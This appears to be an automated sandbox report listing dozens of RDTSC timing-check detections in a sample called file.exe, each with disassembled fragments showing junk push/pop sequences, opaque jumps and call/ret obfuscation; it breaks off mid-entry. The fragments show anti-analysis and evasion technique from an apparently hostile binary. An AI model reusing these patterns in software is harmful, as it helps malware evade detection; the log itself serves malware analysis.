Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E592A second address: 11E5934 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76D9274FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5934 second address: 11E596E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76D8D6051Dh 0x00000008 jmp 00007F76D8D60517h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F76D8D60512h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E596E second address: 11E598F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F76D9274FFEh 0x00000012 push ecx 0x00000013 jns 00007F76D9274FF6h 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E598F second address: 11E59A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E59A2 second address: 11E59BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jg 00007F76D9275008h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F76D9274FF6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5B1C second address: 11E5B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5B20 second address: 11E5B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206574 second address: 1206579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206579 second address: 120659C instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D927500Ch 0x00000008 jmp 00007F76D9275006h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD552 second address: 11DD565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 je 00007F76D8D60506h 0x0000000c jg 00007F76D8D60506h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD565 second address: 11DD56B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD56B second address: 11DD584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60515h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD584 second address: 11DD58A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD58A second address: 11DD59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F76D8D60512h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD59B second address: 11DD5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD5A1 second address: 11DD5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F76D8D60506h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12044A1 second address: 12044A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120460C second address: 1204636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76D8D60518h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jp 00007F76D8D60506h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204636 second address: 1204654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275004h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204654 second address: 120466D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F76D8D60506h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120466D second address: 1204671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120495B second address: 1204964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204964 second address: 120496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76D9274FF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120496E second address: 1204972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204A96 second address: 1204AAF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76D9274FF6h 0x00000008 jno 00007F76D9274FF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F76D9274FF6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204D52 second address: 1204D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F76D8D60506h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204D5D second address: 1204D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275000h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1204D72 second address: 1204D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12052DF second address: 12052EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F76D9274FF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12052EB second address: 12052F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12052F1 second address: 12052FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12052FD second address: 1205301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12056FB second address: 1205701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205701 second address: 1205712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jp 00007F76D8D60508h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205712 second address: 1205726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D9275000h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205726 second address: 120572A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205C98 second address: 1205C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205C9C second address: 1205CC6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D8D60506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F76D8D60506h 0x00000012 jmp 00007F76D8D60518h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205CC6 second address: 1205CE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F76D9275009h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205CE5 second address: 1205D01 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76D8D60517h 0x00000008 jmp 00007F76D8D60511h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D84C4 second address: 11D84C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C4B0 second address: 120C500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jns 00007F76D8D60511h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F76D8D6050Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ecx 0x0000001f pushad 0x00000020 jmp 00007F76D8D60513h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C9251 second address: 11C9294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F76D9274FFBh 0x0000000e jmp 00007F76D9275004h 0x00000013 popad 0x00000014 pushad 0x00000015 je 00007F76D9274FFCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F9D6 second address: 120F9F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D8D60506h 0x00000008 ja 00007F76D8D60506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F76D8D60506h 0x0000001c jl 00007F76D8D60506h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F9F8 second address: 120F9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12136E9 second address: 121370F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 05669D42h 0x00000011 mov dword ptr [ebp+122D2ED8h], edi 0x00000017 push F497D719h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f jc 00007F76D8D60506h 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121370F second address: 1213715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1213B6C second address: 1213B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12142E5 second address: 12142FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76D9274FFBh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12146C1 second address: 12146C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12146C6 second address: 12146EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76D9275003h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214DCE second address: 1214DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214DD2 second address: 1214DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F76D9274FF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214DE4 second address: 1214DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214DE9 second address: 1214E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D9275003h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214E01 second address: 1214E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+122D29A5h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F76D8D60508h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d call 00007F76D8D60519h 0x00000032 sub di, DCC4h 0x00000037 pop ebx 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push edi 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e pop edi 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1215736 second address: 121573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1216716 second address: 1216724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D6050Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121713B second address: 1217141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1217141 second address: 121715A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1215FF5 second address: 1215FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1217C7D second address: 1217C83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1217C83 second address: 1217C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1219CBD second address: 1219CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B7F1 second address: 121B81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76D9275008h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F76D9274FFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B81F second address: 121B831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D8D6050Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E5DF second address: 121E5E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121EB72 second address: 121EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221113 second address: 1221119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221119 second address: 122111D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122111D second address: 1221121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221121 second address: 122117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F76D8D6050Bh 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D2F7Eh], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F76D8D60508h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov edi, 13CAB310h 0x00000036 push 00000000h 0x00000038 jmp 00007F76D8D60510h 0x0000003d mov dword ptr [ebp+122D27CEh], eax 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122117D second address: 1221181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221181 second address: 122118B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1218498 second address: 121849C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1218FE6 second address: 1219012 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76D8D60508h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F76D8D60525h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F76D8D60517h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121849C second address: 12184A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12184A6 second address: 12184AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122317D second address: 1223183 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1225357 second address: 122535B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122535B second address: 122539E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F76D9275000h 0x0000000d nop 0x0000000e movsx edi, si 0x00000011 mov edi, esi 0x00000013 push 00000000h 0x00000015 add dword ptr [ebp+1245F3EBh], eax 0x0000001b push 00000000h 0x0000001d sub dword ptr [ebp+122D3219h], ebx 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F76D9275002h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122539E second address: 12253BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8D60518h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122737F second address: 1227383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1227383 second address: 122739D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122C9C3 second address: 122C9D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9274FFAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122C9D1 second address: 122CA5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F76D8D60512h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F76D8D60508h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c xor dword ptr [ebp+12474AC8h], ecx 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D2C92h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F76D8D60508h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jo 00007F76D8D60508h 0x0000005c mov edi, edx 0x0000005e mov edi, esi 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221387 second address: 122138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222332 second address: 122233C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76D8D6050Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122CA5D second address: 122CA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12243C4 second address: 12243C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1225567 second address: 12255FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D9274FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F76D9275002h 0x00000011 nop 0x00000012 push esi 0x00000013 mov dword ptr [ebp+122D1C79h], esi 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F76D9274FF8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b cld 0x0000003c mov edi, dword ptr [ebp+122D295Eh] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 sbb edi, 4F824512h 0x0000004f mov eax, dword ptr [ebp+122D0FE5h] 0x00000055 mov ebx, edi 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push edx 0x0000005c call 00007F76D9274FF8h 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], edx 0x00000066 